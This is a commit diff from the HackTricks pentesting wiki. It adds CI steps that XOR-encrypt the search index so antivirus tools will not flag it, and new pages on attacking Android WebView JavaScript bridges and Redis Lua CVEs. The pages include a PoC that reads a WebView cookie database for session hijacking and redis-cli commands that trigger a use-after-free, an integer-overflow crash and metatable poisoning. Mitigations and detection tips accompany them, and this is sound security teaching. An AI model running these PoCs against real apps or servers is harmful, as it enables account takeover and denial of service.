HackTricks-wiki
diff --git a/‎.github/workflows/build_master.yml‎
Lines changed: 21 additions & 2 deletions b/‎.github/workflows/build_master.yml‎
Lines changed: 21 additions & 2 deletions
diff --git a/‎.github/workflows/translate_all.yml‎
Lines changed: 23 additions & 4 deletions b/‎.github/workflows/translate_all.yml‎
Lines changed: 23 additions & 4 deletions
diff --git a/‎src/SUMMARY.md‎
Lines changed: 2 additions & 2 deletions b/‎src/SUMMARY.md‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎src/mobile-pentesting/android-app-pentesting/webview-attacks.md‎
Lines changed: 106 additions & 0 deletions b/‎src/mobile-pentesting/android-app-pentesting/webview-attacks.md‎
Lines changed: 106 additions & 0 deletions
diff --git a/‎src/network-services-pentesting/6379-pentesting-redis.md‎
Lines changed: 73 additions & 0 deletions b/‎src/network-services-pentesting/6379-pentesting-redis.md‎
Lines changed: 73 additions & 0 deletions
@@ -82,9 +82,28 @@ jobs:
           RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
           echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
           
-          # Copy the .gz version to the searchindex repo
+          # XOR encrypt the compressed file
+          KEY='Prevent_Online_AVs_From_Flagging_HackTricks_Search_Gzip_As_Malicious_394h7gt8rf9u3rf9g'
+          cat > /tmp/xor_encrypt.py << 'EOF'
+          import sys
+          key = sys.argv[1]
+          input_file = sys.argv[2]
+          output_file = sys.argv[3]
+          with open(input_file, 'rb') as f:
+              data = f.read()
+          key_bytes = key.encode('utf-8')
+          encrypted = bytearray(len(data))
+          for i in range(len(data)):
+              encrypted[i] = data[i] ^ key_bytes[i % len(key_bytes)]
+          with open(output_file, 'wb') as f:
+              f.write(encrypted)
+          print(f"Encrypted: {len(data)} bytes")
+          EOF
+          python3 /tmp/xor_encrypt.py "$KEY" "${ASSET}.gz" "${ASSET}.gz.enc"
+          
+          # Copy the encrypted .gz version to the searchindex repo
           cd /tmp/searchindex-repo
-          cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+          cp "${GITHUB_WORKSPACE}/${ASSET}.gz.enc" "${FILENAME}.gz"
           
           # Stage the updated file
           git add "${FILENAME}.gz"
 
@@ -163,8 +163,27 @@ jobs:
           RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
           echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
           
-          # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js)
-          cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz"
+          # XOR encrypt the compressed file
+          KEY='Prevent_Online_AVs_From_Flagging_HackTricks_Search_Gzip_As_Malicious_394h7gt8rf9u3rf9g'
+          cat > /tmp/xor_encrypt.py << 'EOF'
+          import sys
+          key = sys.argv[1]
+          input_file = sys.argv[2]
+          output_file = sys.argv[3]
+          with open(input_file, 'rb') as f:
+              data = f.read()
+          key_bytes = key.encode('utf-8')
+          encrypted = bytearray(len(data))
+          for i in range(len(data)):
+              encrypted[i] = data[i] ^ key_bytes[i % len(key_bytes)]
+          with open(output_file, 'wb') as f:
+              f.write(encrypted)
+          print(f"Encrypted: {len(data)} bytes")
+          EOF
+          python3 /tmp/xor_encrypt.py "$KEY" "${ASSET}.gz" "${ASSET}.gz.enc"
+          
+          # Copy ONLY the encrypted .gz version to the searchindex repo (no uncompressed .js)
+          cp "${ASSET}.gz.enc" "/tmp/searchindex-repo/${FILENAME}.gz"
           
           # Commit and push with retry logic
           cd /tmp/searchindex-repo
@@ -203,8 +222,8 @@ jobs:
                       git config user.name "GitHub Actions"
                       git config user.email "[email protected]"
                       
-                      # Re-copy ONLY the .gz version (no uncompressed .js)
-                      cp "${ASSET}.gz" "${FILENAME}.gz"
+                      # Re-copy ONLY the encrypted .gz version (no uncompressed .js)
+                      cp "${ASSET}.gz.enc" "${FILENAME}.gz"
                       
                       git add "${FILENAME}.gz"
                       git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build"
 
@@ -478,6 +478,7 @@
       - [disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md)
     - [Php Rce Abusing Object Creation New Usd Get A Usd Get B](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md)
     - [PHP SSRF](network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md)
+  - [Perl Tricks](network-services-pentesting/pentesting-web/perl-tricks.md)
   - [PrestaShop](network-services-pentesting/pentesting-web/prestashop.md)
   - [Python](network-services-pentesting/pentesting-web/python.md)
   - [Rocket Chat](network-services-pentesting/pentesting-web/rocket-chat.md)
@@ -587,8 +588,6 @@
 
 # 🕸️ Pentesting Web
 
-- [Less Code Injection Ssrf](pentesting-web/less-code-injection-ssrf.md)
-- [Mass Assignment Cwe 915](pentesting-web/mass-assignment-cwe-915.md)
 - [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
 - [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
   - [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md)
@@ -669,6 +668,7 @@
 - [LDAP Injection](pentesting-web/ldap-injection.md)
 - [Login Bypass](pentesting-web/login-bypass/README.md)
   - [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
+- [Mass Assignment Cwe 915](pentesting-web/mass-assignment-cwe-915.md)
 - [NoSQL injection](pentesting-web/nosql-injection.md)
 - [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
 - [Open Redirect](pentesting-web/open-redirect.md)
 
@@ -337,6 +337,109 @@ webView.reload()
 
 - To mitigate risks, **restrict JavaScript bridge usage** to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17.
 
+#### Abusing dispatcher-style JS bridges (invokeMethod/handlerName)
+
+A common pattern is a single exported method (e.g., `@JavascriptInterface void invokeMethod(String json)`) that deserializes attacker-controlled JSON into a generic object and dispatches based on a provided handler name. Typical JSON shape:
+
+```json
+{
+  "handlerName": "toBase64",
+  "callbackId": "cb_12345",
+  "asyncExecute": "true",
+  "data": { /* handler-specific fields */ }
+}
+```
+
+Risk: if any registered handler performs privileged actions on attacker data (e.g., direct file reads), you can call it by setting `handlerName` accordingly. Results are usually posted back into the page context via `evaluateJavascript` and a callback/promise mechanism keyed by `callbackId`.
+
+Key hunting steps
+- Decompile and grep for `addJavascriptInterface(` to learn the bridge object name (e.g., `xbridge`).
+- In Chrome DevTools (chrome://inspect), type the bridge object name in the Console (e.g., `xbridge`) to enumerate exposed fields/methods; look for a generic dispatcher like `invokeMethod`.
+- Enumerate handlers by searching for classes implementing `getModuleName()` or registration maps.
+
+#### Arbitrary file read via URI → File sinks (Base64 exfiltration)
+
+If a handler takes a URI, calls `Uri.parse(req.getUri()).getPath()`, builds `new File(...)` and reads it without allowlists or sandbox checks, you get an arbitrary file read in the app sandbox that bypasses WebView settings like `setAllowFileAccess(false)` (the read happens in native code, not via the WebView network stack).
+
+PoC to exfiltrate the Chromium WebView cookie DB (session hijack):
+
+```javascript
+// Minimal callback sink so native can deliver the response
+window.WebViewJavascriptBridge = {
+  _handleMessageFromObjC: function (data) { console.log(data) }
+};
+
+const payload = JSON.stringify({
+  handlerName: 'toBase64',
+  callbackId: 'cb_' + Date.now(),
+  data: { uri: 'file:///data/data/<pkg>/app_webview/Default/Cookies' }
+});
+
+xbridge.invokeMethod(payload);
+```
+
+Notes
+- Cookie DB paths vary across devices/providers. Common ones:
+  - `file:///data/data/<pkg>/app_webview/Default/Cookies`
+  - `file:///data/data/<pkg>/app_webview_<pkg>/Default/Cookies`
+- The handler returns Base64; decode to recover cookies and impersonate the user in the app’s WebView profile.
+
+Detection tips
+- Watch for large Base64 strings returned via `evaluateJavascript` when using the app.
+- Grep decompiled sources for handlers that accept `uri`/`path` and convert them to `new File(...)`.
+
+#### Bypassing WebView privilege gates – endsWith() host checks
+
+Privilege decisions (selecting a JSB-enabled Activity) often rely on host allowlists. A flawed pattern is:
+
+```java
+String host = Uri.parse(url).getHost();
+boolean z = true;
+if (!host.endsWith(".trusted.com")) {
+    if (!".trusted.com".endsWith(host)) {
+        z = false;
+    }
+}
+// z==true → open privileged WebView
+```
+
+Equivalent logic (De Morgan’s):
+
+```java
+boolean z = host.endsWith(".trusted.com") || 
+            ".trusted.com".endsWith(host);
+```
+
+This is not an origin check. Many unintended hosts satisfy the second clause, letting untrusted domains into the privileged Activity. Always verify scheme and host against a strict allowlist (exact match or a correct subdomain check with dot-boundaries), not `endsWith` tricks.
+
+#### javascript:// execution primitive via loadUrl
+
+Once inside a privileged WebView, apps sometimes execute inline JS via:
+
+```java
+webView.loadUrl("javascript:" + jsPayload);
+```
+
+If an internal flow triggers `loadUrl("javascript:...")` in that context, injected JS executes with bridge access even if the external page wouldn’t normally be allowed. Pentest steps:
+- Grep for `loadUrl("javascript:` and `evaluateJavascript(` in the app.
+- Try to reach those code paths after forcing navigation to the privileged WebView (e.g., via a permissive deep link chooser).
+- Use the primitive to call the dispatcher (`xbridge.invokeMethod(...)`) and reach sensitive handlers.
+
+Mitigations (developer checklist)
+- Strict origin verification for privileged Activities: canonicalize and compare scheme/host against an explicit allowlist; avoid `endsWith`-based checks. Consider Digital Asset Links when applicable.
+- Scope bridges to trusted pages only and re-check trust on every call (per-call authorization).
+- Remove or tightly guard filesystem-capable handlers; prefer `content://` with allowlists/permissions over raw `file://` paths.
+- Avoid `loadUrl("javascript:")` in privileged contexts or gate it behind strong checks.
+- Remember `setAllowFileAccess(false)` doesn’t protect against native file reads via the bridge.
+
+#### JSB enumeration and debugging tips
+
+- Enable WebView remote debugging to use Chrome DevTools Console:
+  - App-side (debug builds): `WebView.setWebContentsDebuggingEnabled(true)`
+  - System-side: modules like [LSPosed](https://github.com/LSPosed/LSPosed) or Frida scripts can force-enable debugging even in release builds. Example Frida snippet for Cordova WebViews: [cordova enable webview debugging](http://codeshare.frida.re/@gameFace22/cordova---enable-webview-debugging/)
+- In DevTools, type the bridge object name (e.g., `xbridge`) to see exposed members and probe the dispatcher.
+
+
 ### Reflection-based Remote Code Execution (RCE)
 
 - A documented method allows achieving RCE through reflection by executing a specific payload. However, the `@JavascriptInterface` annotation prevents unauthorized method access, limiting the attack surface.
@@ -393,6 +496,9 @@ xhr.send(null)
 - [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
 - [Pwn2Own Ireland 2024 – Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
 - [Demonstration video](https://www.youtube.com/watch?v=LAIr2laU-So)
+- [Account takeover in Android app via JSB – tuxplorer.com](https://tuxplorer.com/posts/account-takeover-via-jsb/)
+- [LSPosed – systemless Xposed framework](https://github.com/LSPosed/LSPosed)
+- [Frida codeshare: Cordova – enable WebView debugging](http://codeshare.frida.re/@gameFace22/cordova---enable-webview-debugging/)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
@@ -253,6 +253,68 @@ Some **CVEs to escape from LUA**:
 
 - [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543)
 
+#### Redis Lua Scripting Engine: Sandbox Escapes & Memory Corruption (CVE-2025-49844/46817/46818)
+
+Recent Redis releases fixed multiple issues in the embedded Lua engine that allow sandbox escape, memory corruption and cross-user code execution. These techniques apply when:
+- Attacker can authenticate to Redis and Lua is enabled (EVAL/EVALSHA or FUNCTION are usable)
+- Redis version is older than 8.2.2, 8.0.4, 7.4.6, 7.2.11, or 6.2.20
+
+Tip: If you are new to Lua sandboxing tricks, check this page for general techniques: 
+
+{{#ref}}
+../generic-methodologies-and-resources/lua/bypass-lua-sandboxes/README.md
+{{#endref}}
+
+**Patch-level context:**
+- Fixed in: 8.2.2, 8.0.4, 7.4.6, 7.2.11, 6.2.20
+- Affected when Lua scripting is enabled and the above versions are not applied
+
+**CVE-2025-49844 — GC-timed Use-After-Free in Lua parser (`lparser.c: luaY_parser`)**
+- Idea: Force garbage collection while the parser still references a freshly-inserted TString. When GC reclaims it, the parser uses a freed pointer (UAF) → crash/DoS and potential native code execution outside the Lua sandbox.
+- Trigger strategy:
+  1) Create memory pressure with huge strings to encourage GC activity
+  2) Explicitly run GC while a large source chunk is being compiled
+  3) Compile a very large Lua script in a loop until GC aligns with parsing
+
+Minimal EVAL harness to reproduce crashes
+```bash
+# Auth as needed (-a/--user), then run EVAL with 0 keys
+redis-cli -h <host> -p 6379 -a <password> EVAL "\
+local a = string.rep('asdf', 65536); \
+collectgarbage('collect'); \
+local src = string.rep('x', 1024 * 1024); \
+local f = loadstring(src); \
+return 'done'" 0
+```
+
+Notes:
+- Multiple attempts may be required to align GC with luaY_parser. A crash indicates the UAF was hit.
+- From exploitation to RCE requires memory grooming and native code pivoting beyond the Redis Lua sandbox.
+
+**CVE-2025-46817 — Integer overflow in unpack (`lbaselib.c: luaB_unpack`)**
+- Root cause: The count `n = e - i + 1` is computed without unsigned casts, so extreme indices wrap, making Lua attempt to unpack far more elements than exist → stack corruption and memory exhaustion.
+- PoC (DoS/mem exhaustion):
+```bash
+redis-cli -h <host> -p 6379 -a <password> EVAL "return unpack({'a','b','c'}, -1, 2147483647)" 0
+```
+- Expect the server to try returning an enormous number of values and eventually crash or OOM.
+
+**CVE-2025-46818 — Cross-user privilege escalation via basic type metatables**
+- Root cause: On engine initialization, metatables for basic types (e.g., strings, booleans) weren’t set read-only. Any authenticated user can poison them to inject methods other users might call later.
+- Example (string metatable poisoning):
+```bash
+# Inject a method on strings and then exercise it
+redis-cli -h <host> -p 6379 -a <password> EVAL "\
+getmetatable('').__index = function(_, key) \
+  if key == 'testfunc' then \
+    return function() return 'testfuncoutput' end \
+  end \
+end; \
+return ('teststring').testfunc()" 0
+# → Returns: testfuncoutput
+```
+- Impact: Cross-user code execution inside the Lua sandbox using the victim’s Redis permissions. Useful for lateral movement/priv-esc within Redis ACL contexts.
+
 ### Master-Slave Module
 
 The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.
@@ -306,6 +368,17 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
 
 _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
 
+## References
+
+- [Recent Vulnerabilities in Redis Server’s Lua Scripting Engine (OffSec)](https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine/)
+- [NVD: CVE-2025-49844](https://nvd.nist.gov/vuln/detail/CVE-2025-49844)
+- [NVD: CVE-2025-46817](https://nvd.nist.gov/vuln/detail/CVE-2025-46817)
+- [NVD: CVE-2025-46818](https://nvd.nist.gov/vuln/detail/CVE-2025-46818)
+- [Wiz analysis of Redis RCE (CVE-2025-49844)](https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844)
+- [PoC: CVE-2025-49844 — Lua parser UAF](https://github.com/dwisiswant0/CVE-2025-49844)
+- [PoC: CVE-2025-46817 — unpack integer overflow](https://github.com/dwisiswant0/CVE-2025-46817)
+- [PoC: CVE-2025-46818 — basic-type metatable abuse](https://github.com/dwisiswant0/CVE-2025-46818)
+
 {{#include ../banners/hacktricks-training.md}}